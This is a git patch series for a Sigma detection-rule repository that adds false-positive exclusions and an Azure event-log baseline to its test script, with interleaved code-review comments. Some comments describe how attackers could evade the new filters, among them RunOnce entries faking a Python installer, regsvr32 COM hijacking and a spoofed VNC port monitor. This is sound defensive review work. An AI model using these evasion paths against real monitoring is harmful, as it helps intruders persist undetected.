@@ -146,6 +146,18 @@ OS="Windows 11" pids+=($!) PID2OS[$!]=$OS +# Windows 2022.0.20348 Azure +OS="Windows 2022.0.20348 Azure" +{ + wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" + ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json + echo " Finished Checking for Sigma matches in $OS baseline" +}& +pids+=($!) +PID2OS[$!]=$OS + # Sync with all background jobs for pid in ${pids[*]}; do echo "===> Waiting for PID $pid / ${PID2OS[$pid]}" @@ -171,6 +183,9 @@ echo "Windows 2022:" echo echo "Windows 2022 AD:" "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv +echo +echo "Windows 2022.0.20348 Azure:" +"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv echo read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s From 40e0dfcb292457b784cfe93c1a84d35979dbbfed Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:38:10 +0200 Subject: [PATCH 85/96] chore: add new known FPs --- .github/workflows/known-FPs.csv | 11 +++++++---- tests/check-baseline-local.sh | 4 ++++ 2 files changed, 11 insertions(+), 4 deletions(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index e29877a27..a22dafcd5 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv 
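Review bot: The new Azure block fetches `releases/latest/download/win2022-0-20348-azure.tgz` with `wget --quiet`, so the local run tracks whatever release is current while the CI workflow pins `$EVTX_BASELINE_VERSION`, and a failed download stays silent until `tar xzf` errors inside the background subshell. Pinning the same version tag here, or at least using `--no-verbose` as the workflow does so failures are visible, keeps the two checks comparable. Like the surrounding blocks, the archive is extracted without any integrity check.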
@@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen +1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml -8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC +8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 -162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe -cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241 -bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223 +162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe +cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 +bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry 
Keys;target\.exe 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe @@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$ 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 +734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe @@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index b3d966d36..1c9bae2f7 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -113,6 +113,7 @@ PID2OS[$!]=$OS # Windows 10 OS="Windows 10" { + sleep 10 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz tar xzf win10-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" 
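Review bot: The last added row `949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon` repeats the rule id in the title column, where every other row carries the rule title; if `matchgrep.sh` keys on the id alone this is cosmetic, but it breaks the file's convention and should carry the rule's title (not visible in this diff). The several new `Computer: Agamemnon` entries suppress their rules for an entire host name rather than for a specific artefact, which is a wider exclusion than the existing rows; a narrower pattern, or a commit note explaining that the host is a dedicated baseline machine, would make the scope explicit.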
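Review bot: The `sleep 10` inserted before the Windows 10 download (and the `sleep 20`, `sleep 30`, `sleep 40` in the following three hunks) has no comment explaining the staggering; presumably it spaces out the parallel downloads, but a reader cannot tell that from the code. A one-line comment above the first sleep such as `# stagger parallel downloads; each block waits a little longer than the previous one` documents the intent, and a single `STAGGER=10` variable multiplied per block would make the pattern obvious.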
@@ -125,6 +126,7 @@ PID2OS[$!]=$OS # Windows 2022 AD OS="Windows 2022 AD" { + sleep 20 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz tar xzf win2022-ad.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -137,6 +139,7 @@ PID2OS[$!]=$OS # Windows 11 OS="Windows 11" { + sleep 30 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz tar xzf win11-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" @@ -149,6 +152,7 @@ PID2OS[$!]=$OS # Windows 2022.0.20348 Azure OS="Windows 2022.0.20348 Azure" { + sleep 40 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz tar xzf win2022-0-20348-azure.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" From b7f20b884c8630aac5a6ce9ef379999e0711c9e1 Mon Sep 17 00:00:00 2001 
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:39:24 +0200 Subject: [PATCH 86/96] fix: FPs from new evtx-baseline --- .../windows/dns_query/dns_query_win_susp_ldap.yml | 11 +++++++---- ...le_event_win_susp_teamviewer_remote_session.yml | 4 ++-- .../image_load_uipromptforcreds_dlls.yml | 7 +++++-- .../posh_pm_alternate_powershell_hosts.yml | 6 ++++-- .../proc_creation_win_ntfs_short_name_use_cli.yml | 5 +++-- .../proc_creation_win_susp_regsvr32_anomalies.yml | 4 ++-- ...y_delete_removal_com_hijacking_registry_key.yml | 9 +++++++++ .../registry_event_susp_atbroker_change.yml | 10 +++++++--- ...sep_reg_keys_modification_currentcontrolset.yml | 9 ++++++++- ...t_asep_reg_keys_modification_currentversion.yml | 14 +++++++++++--- ..._set_asep_reg_keys_modification_wow6432node.yml | 5 ++++- .../registry_set_persistence_search_order.yml | 7 ++++++- .../registry_set_servicedll_hijack.yml | 4 +++- .../registry_set/registry_set_sip_persistence.yml | 7 ++++++- .../registry_set_susp_printer_driver.yml | 8 ++++++-- .../windows/sysmon/sysmon_config_modification.yml | 2 +- 16 files changed, 84 insertions(+), 28 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index 5f0998042..8acfb3fce 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -1,9 +1,9 @@ -title: Suspicious Ldap Domain Access +title: Suspicious LDAP Domain Access id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e -description: Detect suspicious ldap request from non Windows application +description: Detect suspicious LDAP request from non-Windows application status: experimental date: 2022/08/20 -modified: 2022/09/18 +modified: 2022/09/21 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md 
@@ -16,7 +16,10 @@ detection: filter_windows: Image|startswith: 'C:\Windows\' filter_defender: - Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + Image|startswith: + - 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + - 'C:\Program Files\Windows Defender\MsMpEng.exe' + - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe' Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml index 8d6fd06ce..bc6e34bd4 100644 --- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml @@ -14,11 +14,11 @@ logsource: category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '\TeamViewer\RemotePrinting\tvprint.db' - '\TeamViewer\TVNetwork.log' selection2: - TargetFilename|contains|all: + TargetFilename|contains|all: - '\TeamViewer' - '_Logfile.log' condition: 1 of selection* diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index a9e409fd4..eac2f40fa 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/09/20 +modified: 2022/09/21 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access 
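Review bot: The extended `filter_defender` puts two full executable paths (`C:\Program Files\Windows Defender\MsMpEng.exe` and its `(x86)` twin) into an `Image|startswith` list next to a directory prefix, while the filter also requires `Image|endswith: '\MsMpEng.exe'`; for the two full paths the `endswith` is redundant. Writing them as directory prefixes, `- 'C:\Program Files\Windows Defender\'` and `- 'C:\Program Files (x86)\Windows Defender\'`, keeps the list homogeneous and makes the filter easier to audit.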
@@ -31,7 +31,10 @@ detection: - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: - Image|endswith: '\opera_autoupdate.exe' + Image|endswith: + - '\opera_autoupdate.exe' + - '\procexp64.exe' + - '\procexp.exe' filter_full: Image: - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 317ce299b..3f7989312 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/09/18 +modified: 2022/09/20 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html @@ -26,7 +26,9 @@ detection: filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' filter_help_update: - Payload|contains: 'Update-Help' + Payload|contains: + - 'Update-Help' + - 'Failed to update Help for the module' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml index 4158116e8..3f75f2dfd 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml 
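Review bot: The additions to `filter_end` exclude `\procexp64.exe` and `\procexp.exe` by file name only, whereas the neighbouring filters in this rule anchor on `C:\Program Files\` style prefixes; a name-only exclusion is a weaker trust anchor than a path-anchored one. If Process Explorer runs from a known location in the baseline environment, an `Image|startswith` anchored there would be more precise; otherwise a comment such as `# name-only match: procexp is usually run from arbitrary folders` records the decision.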
@@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/05 -modified: 2022/08/12 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -37,9 +37,10 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index 7cb98a4f5..3bd4048a7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/09/18 +modified: 2022/09/21 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -74,7 +74,7 @@ detection: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' filter_legitimate: - CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' + CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: 1 of selection* and not 1 of filter* fields: - CommandLine 
diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 6b6ec4ec7..71184d34b 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -35,6 +35,15 @@ detection: Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: '\wireshark-capture-file\' + filter_opera: + Image|startswith: + - 'C:\Program Files\Opera\' + - 'C:\Program Files (x86)\Opera\' + Image|endswith: '\installer.exe' + filter_peazip: + Image|contains: 'peazip' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|startswith: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index 23cc3a56b..f3cb1b87c 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml 
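Review bot: `filter_peazip` uses `TargetObject|startswith: '\PeaZip.'`, but a registry `TargetObject` begins with the hive name (`HKCR\...` or `HKEY_CLASSES_ROOT\...`, as the comment above it notes), so a value that starts with a backslash can never match and the filter is dead. The sibling filters that make the same hive-variation point use `contains`; this one should read `TargetObject|contains: '\PeaZip.'`. `Image|contains: 'peazip'` is broad on its own, so the `TargetObject` clause is what keeps this exclusion narrow once it actually works.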
@@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2022/09/18 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.t1218 @@ -21,7 +21,11 @@ detection: TargetObject|contains: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: selection + filter: + Image: 'C:\Windows\system32\atbroker.exe' + TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' + Details: '(Empty)' + condition: selection and not filter falsepositives: - Creation of non-default, legitimate at usage level: medium diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index 8a935e286..608a3071b 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: registry_set product: windows 
@@ -45,6 +45,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder' + filter_realvnc: + Image: 'C:\Windows\System32\spoolsv.exe' + TargetObject|endswith: '\Print\Monitors\MONVNC\Driver' + Details: 'VNCpm.dll' condition: all of system_control_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index ad5a53caa..500836df0 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/09/06 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -103,8 +103,10 @@ detection: - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: - TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' - Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' + TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{' + Details|contains|all: + - '\AppData\Local\Package Cache\{' + - '}\python-' Details|endswith: '.exe" /burn.runonce' filter_officeclicktorun: Image|startswith: 
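Review bot: `filter_realvnc` excludes the exact shape of port-monitor persistence (T1547.010): spoolsv.exe is the process that writes `\Print\Monitors\<name>\Driver` for every registered monitor, and both the monitor name `MONVNC` and the DLL name `VNCpm.dll` are chosen by whoever calls AddMonitor, so a malicious monitor registered under those two names is now silently dropped. Because the monitor DLL presumably still has to live in System32 (admin required), the exclusion is acceptable, but it should say so: `# spoolsv.exe writes the Driver value for every port monitor; only RealVNC's MONVNC/VNCpm.dll pair is excluded, a monitor using other names still alerts`. `filter_poqexec` on `ProviderOrder` carries no value constraint at all; if the `Details` poqexec.exe writes there are stable in the baseline, pin them, otherwise note why not. The `system_control_*` selections this filters are outside the hunk.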
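Review bot: The generalised `filter_python` is built entirely from tokens a low-privileged user controls: `%LOCALAPPDATA%\Package Cache` is user-writable, so an implant that registers `RunOnce\{anything}` = `"C:\Users\u\AppData\Local\Package Cache\{x}\python-evil.exe" /burn.runonce` is excluded from this rule, and the old single-GUID form was only marginally stronger. No registry_set field can prove such a path belongs to the real installer, but you can at least require that the writer is the cached installer itself — the Burn bootstrapper registers its own RunOnce entry, so `Image|contains|all: ['\AppData\Local\Package Cache\{', '}\python-']` should hold (confirm against the baseline event that produced this FP). Whatever is chosen, the residual weakness belongs in a comment above the filter: `# user-writable path — a RunOnce mimicking the python Burn bootstrapper is not alerted`. The `current_version_*` selections are outside the hunk.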
@@ -125,6 +127,12 @@ detection: - '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui' - '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui' - '{472083B0-C522-11CF-8763-00608CC02F24}' + filter_aurora_dashbaord: + Image|endswith: + - '\aurora-agent-64.exe' + - '\aurora-agent.exe' + TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard' + Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe' condition: all of current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 0fe1f398d..31626072c 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/05 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -72,6 +72,9 @@ detection: Image|endswith: '\OfficeClickToRun.exe' filter_ms_win_desktop_runtime: Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-' + filter_vcredist: + Image|endswith: '\VC_redist.x64.exe' + Details|endswith: '}\VC_redist.x64.exe" /burn.runonce' condition: all of wow_current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml 
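Review bot: The new filter key is misspelled, `filter_aurora_dashbaord`; the `1 of filter_*` condition still picks it up, but anyone grepping for the dashboard exclusion later will miss it, so rename it to `filter_aurora_dashboard`. The exclusion itself is reasonably tight because `Details` is pinned to the full `C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe` path (writable only with admin rights) even though `Image|endswith` is not path-anchored; a one-line comment saying the `Details` pin is what carries the filter would keep a future edit from loosening it.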
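Review bot: `filter_vcredist` pins neither the directory of the writing process nor the directory in the value, only the `\VC_redist.x64.exe` image suffix and the `}\VC_redist.x64.exe" /burn.runonce` value suffix, so a lookalike at any path that registers a RunOnce command ending that way is excluded — the loosest filter in this file. `filter_ms_win_desktop_runtime` just above shows the stronger shape, anchoring `Details|startswith` on `"C:\ProgramData\Package Cache\{`; add the same anchor here, e.g. `Details|startswith: '"C:\ProgramData\Package Cache\{'` next to the existing suffix match, after confirming from the baseline event that the VC redistributable caches under ProgramData and not the user profile. If `VC_redist.x86.exe` shows up in the same baseline it will still alert; say in a comment whether that is intended.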
+++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts 
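Review bot: `filter_inprocserver` drops every `InProcServer32\(Default)` write made by `C:\Windows\System32\regsvr32.exe`, and `regsvr32 /s <dll>` is exactly how an attacker registers a hijacking COM server (signed LOLBin, T1218.010), so the filter turns the rule's own use case into a blind spot — the selection is outside the hunk, but the falsepositives entry describes user-level COM objects, which is where the hijack lands. poqexec.exe can keep the broad exclusion; the regsvr32 branch should additionally require the registered DLL to live in a protected directory, the way `filter_sec_health_svc` above constrains `Details`. The prefixes in the excerpt are a starting point to tune against the baseline (values may be quoted or use `%SystemRoot%`-style variables). Only the System32 regsvr32 is listed, so the SysWOW64 copy still alerts either way — if that is intended, a comment should say so.
```yaml
    filter_inprocserver_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
        TargetObject|endswith: '\InProcServer32\(Default)'
    filter_inprocserver_regsvr32:
        # regsvr32 is an attacker-favoured way to register a hijacking server;
        # only exclude it when the DLL it registers sits in a protected directory
        Image: 'C:\Windows\System32\regsvr32.exe'
        TargetObject|endswith: '\InProcServer32\(Default)'
        Details|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    # … unchanged: condition: selection and not 1 of filter* …
```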
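Review bot: `filter_poqexec` constrains only `Image`, so every `ServiceDll` write by `C:\Windows\System32\poqexec.exe` is excluded regardless of service or DLL path, while the lsass filter directly above pins `TargetObject` and `Details` as well. poqexec.exe executes a queue of file/registry operations handed to it — normally by component servicing — and I have not verified whether an elevated attacker can feed it an arbitrary queue, but the asymmetry alone justifies pinning at least the value, e.g. `Details|startswith: ['%%systemroot%%\', 'C:\Windows\']`, matching the `%%systemroot%%` form the lsass entry already uses (check the baseline for the exact spelling). A comment naming the servicing scenario that produced the FP would also let the next person judge the filter's scope; the `selection` block is outside the hunk.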
